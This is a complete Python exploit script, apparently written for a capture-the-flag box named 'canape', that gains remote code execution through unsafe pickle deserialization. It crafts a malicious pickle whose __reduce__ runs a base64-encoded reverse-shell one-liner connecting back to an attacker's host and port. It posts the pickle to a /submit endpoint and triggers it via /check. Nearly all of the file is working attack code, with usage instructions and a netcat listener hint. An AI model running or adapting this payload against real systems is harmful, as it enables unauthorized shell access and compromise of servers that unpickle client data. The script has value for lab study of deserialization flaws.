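#!/usr/bin/env python
"""Reverse-shell PoC against the "canape" target via Python pickle deserialization.

The target's /submit endpoint stores the posted "character" field and /check
later unpickles it.  pickle.loads() executes whatever callable the stream
names, so a pickle whose __reduce__ returns (os.system, (cmd,)) runs cmd on the
server the moment /check deserializes it.  This is the same class of bug as
eval()/yaml.load() on untrusted input: the fix on the server side is to never
unpickle data a client controls.

Usage:
    pwn.py <LHOST> <LPORT> [TARGET_URL]

    LHOST/LPORT  where the reverse shell connects back to -- start a listener
                 first (e.g. ``nc -lvnp <LPORT>``)
    TARGET_URL   base URL of the vulnerable app (default http://10.10.10.70)

Only run this against systems you are authorized to test.

Fixes over the original script:
  * the argv check tested ``< 2`` but read ``sys.argv[2]`` (IndexError instead
    of the usage message);
  * ``except A or B:`` only ever caught A; connection errors are now caught;
  * the pickle is always emitted with protocol 0 so it stays readable by the
    Python 2 unpickler on the target when this script runs under Python 3;
  * the script runs on both Python 2 and 3 (``pickle`` instead of ``cPickle``).
"""
from __future__ import print_function

import os
import pickle
import sys
from base64 import b64encode
from hashlib import md5

import requests

DEFAULT_TARGET = "http://10.10.10.70"

# Appended after the pickle stream in the "character" field.  Presumably the
# application's /submit handler checks for it -- TODO confirm against the target.
# It is part of the stored bytes and therefore of the md5 that names the file.
CHARACTER_SUFFIX = b"homer"
QUOTE = b"nothing"

# Socket/read timeouts of the original script, in seconds.
SUBMIT_TIMEOUT = 5
CHECK_TIMEOUT = 2


def reverse_shell_command(lhost, lport):
    """Return the shell command that spawns a PTY reverse shell to lhost:lport.

    Args:
        lhost: address the shell connects back to.
        lport: TCP port on lhost (int).
    """
    return (
        '''python -c "import os;import pty;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('%s',%i));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash');"'''
        % (lhost, lport)
    )


class PickleRCE(object):
    """Object whose pickle, when loaded, runs *command* through os.system.

    pickle honours __reduce__: the stream records "call os.system with this
    argument", so this class never has to exist on the target.
    """

    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # base64 the command so its quotes and pipes survive the shell that
        # os.system() hands it to; .decode() keeps the format string a str on
        # Python 3 (b64encode returns bytes there).
        encoded = b64encode(self.command.encode("ascii")).decode("ascii")
        return (os.system, ("echo %s | base64 -d |bash" % encoded,))


def build_payload(command):
    """Return the bytes sent in the "character" form field for *command*."""
    # Protocol 0 is what Python 2's cPickle.dumps() emitted by default; a
    # higher protocol (Python 3's default) would be rejected by the Python 2
    # unpickler on the target.
    return pickle.dumps(PickleRCE(command), protocol=0) + CHARACTER_SUFFIX


def file_id(character, quote=QUOTE):
    """Return the id /check expects: md5 over the two raw field values.

    This mirrors how the original script derives the id, i.e. the server
    presumably names the stored submission the same way -- TODO confirm.
    """
    return md5(character + quote).hexdigest()


def send_payload(base_url, character, quote=QUOTE):
    """POST the crafted pickle to /submit and return the id /check expects.

    Exits with status 1 when the target cannot be reached (the rest of the
    chain is pointless then).
    """
    post_data = {"character": character, "quote": quote}
    try:
        requests.post(base_url + "/submit", data=post_data, timeout=SUBMIT_TIMEOUT)
    # ConnectTimeout subclasses ConnectionError in requests, but a tuple keeps
    # the intent explicit -- the original ``except A or B`` only caught A.
    except (requests.exceptions.ConnectTimeout,
            requests.exceptions.ConnectionError):
        print("[!] Error: something happend with connection.")
        sys.exit(1)
    print("[*] Payload successfuly sent.")
    return file_id(character, quote)


def check(base_url, submission_id):
    """Ask /check to load the stored submission, which triggers the unpickle.

    A read timeout is treated as success: the worker is presumably blocked in
    the pty.spawn()ed shell and never answers, so the script exits 0.
    Otherwise the HTTP status code is returned so the caller can report it.
    """
    try:
        res = requests.post(base_url + "/check", data={"id": submission_id},
                            timeout=CHECK_TIMEOUT)
    except requests.exceptions.ReadTimeout:
        print("[+] Shell session opened.")
        sys.exit(0)
    return res.status_code


def main(argv=None):
    """Parse ``<LHOST> <LPORT> [TARGET_URL]`` and run the submit/check chain."""
    argv = sys.argv if argv is None else argv
    if len(argv) < 3:
        print("[*] usage: pwn.py <LHOST> <LPORT> [TARGET_URL]")
        sys.exit(1)
    lhost = argv[1]
    try:
        lport = int(argv[2])
    except ValueError:
        print("[!] Error: LPORT must be an integer.")
        sys.exit(1)
    if not 0 < lport < 65536:
        print("[!] Error: LPORT must be between 1 and 65535.")
        sys.exit(1)
    base_url = argv[3].rstrip("/") if len(argv) > 3 else DEFAULT_TARGET

    character = build_payload(reverse_shell_command(lhost, lport))
    submission_id = send_payload(base_url, character)
    print("[+] id: %s" % submission_id)
    print("[+] Status: %i" % check(base_url, submission_id))


if __name__ == "__main__":
    main()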